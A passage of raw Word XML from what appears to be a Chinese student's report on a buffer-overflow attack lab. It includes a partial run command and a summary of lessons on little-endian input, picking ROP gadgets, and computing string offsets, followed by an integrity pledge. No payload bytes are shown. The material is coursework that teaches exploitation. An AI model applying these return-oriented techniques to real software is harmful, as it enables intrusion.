          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">target </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">–i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt”将准备好的字符串读入程序中，运行结果如下图所示：</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6187440" cy="900430"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="35" name="图片 35" descr="CS[EKOABWQLLK)FD$[B[9W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S[EKOABWQLLK)FD$[B[9W9"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6187440" cy="900430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5519"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>五、总结体会</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.机器代码使用的是小端法，不能当作大端法输入，不然会错误</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.机器码后面可能有干扰项，应当选择目的机器码后面只有c3，90的机器码作为gadget</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hex2raw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>指令时操作文件和目的文件不能是同一个命名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.c语言中字符串用\n结尾，所以要在字符串代码的ASCII码后面加00表示\n</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5.第五个实验要考虑到字符串的位置来加上相应的偏移量。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>6.可以通过在getbuf处设置断点来确定哪里哪一步输入出现了问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7.命令的操作数可以通过objump反汇编指令来实现，但是反汇编的文件要命名为.s而不是.c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>8.程序如果存在申请内存的指令，可能会导致部分地址被覆盖。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>9.当一个操作没有对应的garget时，可以将该命令拆分来拼凑出需要的操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.第五题要求指令必须有8行及以上，要时刻注意题目要求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>六、诚信声明（不签扣10分）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在完成本次实验过程中，我曾分别与以下各位同学就以下方面做过交流：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>此外，我还参考了以下资料：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在我提交的程序中，还在对应的位置以注释形式记录了具体的参考内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我独立完成了本次实验除以上方面之外的所有工作，包括分析、设计、编码、调试与测试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我清楚地知道，从以上方面获得的信息在一定程度上降低了实验的难度，可能影响起评分。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我从未使用他人代码，不管是原封不动地复制，还是经过某些等价转换。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我未曾也不会向同一课程（包括此后各届）的同学复制或公开我这份程序的代码，我有义务妥善保管好它们。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我编写这个程序无意于破坏或妨碍任何计算机系统的正常运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我清楚地知道，以上情况均为本课程纪律所禁止，若违反，对应的实验成绩将按照0分计。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3234055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>11430</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="376555" cy="988695"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="38" name="墨迹 38"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId31">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="38" name="墨迹 38"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="3919855" y="7860030"/>
                            <a:ext cx="376555" cy="988695"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:254.65pt;margin-top:0.9pt;height:77.85pt;width:29.65pt;z-index:251659264;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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&#10;aTrwVl/+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5GLyduAAAACEBAAAZAAAAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc4XPsWrEMAwG4L3Q&#10;dzDaGyUdylHiZDkOspYUbjWOkpjEsrGc0nv7euzBwQ0ahND3S23/63f1Q0lcYA1NVYMitmFyvGj4&#10;Hi9vJ1CSDU9mD0wabiTQd68v7RftJpclWV0UVRQWDWvO8RNR7EreSBUicZnMIXmTS5sWjMZuZiF8&#10;r+sPTP8N6O5MNUwa0jA1oMZbLMnP7TDPztI52MMT5wcRaA/JwV/9XlCTFsoaHG9YqqnKoYBdi3eP&#10;dX9QSwMEFAAAAAgAh07iQAMVKdoFAQAALQIAABMAAABbQ29udGVudF9UeXBlc10ueG1slZHBTsMw&#10;EETvSPyD5StKnPaAEGrSAylHQKh8gGVvEqv22vKa0P49TtpeEKXi4IO9M29G69V67ywbIZLxWPNF&#10;WXEGqLw22Nf8Y/tcPHBGSaKW1iPU/ADE183tzWp7CEAsu5FqPqQUHoUgNYCTVPoAmCedj06mfI29&#10;CFLtZA9iWVX3QnlMgKlIE4M3qxY6+WkT2+zz87FJBEucPR2FU1bNZQjWKJlyUzGi/pFSnBLK7Jw1&#10;NJhAd7kGF78mTJPLASffa15NNBrYm4zpRbpcQ+hIQvsvjDCWf0Omlo4K33VGQdlGarPtHcZzq0t0&#10;WPrWq//CN7PrGtvgTuSzuELPEmfPLDF/dvMNUEsBAhQAFAAAAAgAh07iQAMVKdoFAQAALQIAABMA&#10;AAAAAAAAAQAgAAAAPwgAAFtDb250ZW50X1R5cGVzXS54bWxQSwECFAAKAAAAAACHTuJAAAAAAAAA&#10;AAAAAAAABgAAAAAAAAAAABAAAAAKBgAAX3JlbHMvUEsBAhQAFAAAAAgAh07iQIoUZjzRAAAAlAEA&#10;AAsAAAAAAAAAAQAgAAAALgYAAF9yZWxzLy5yZWxzU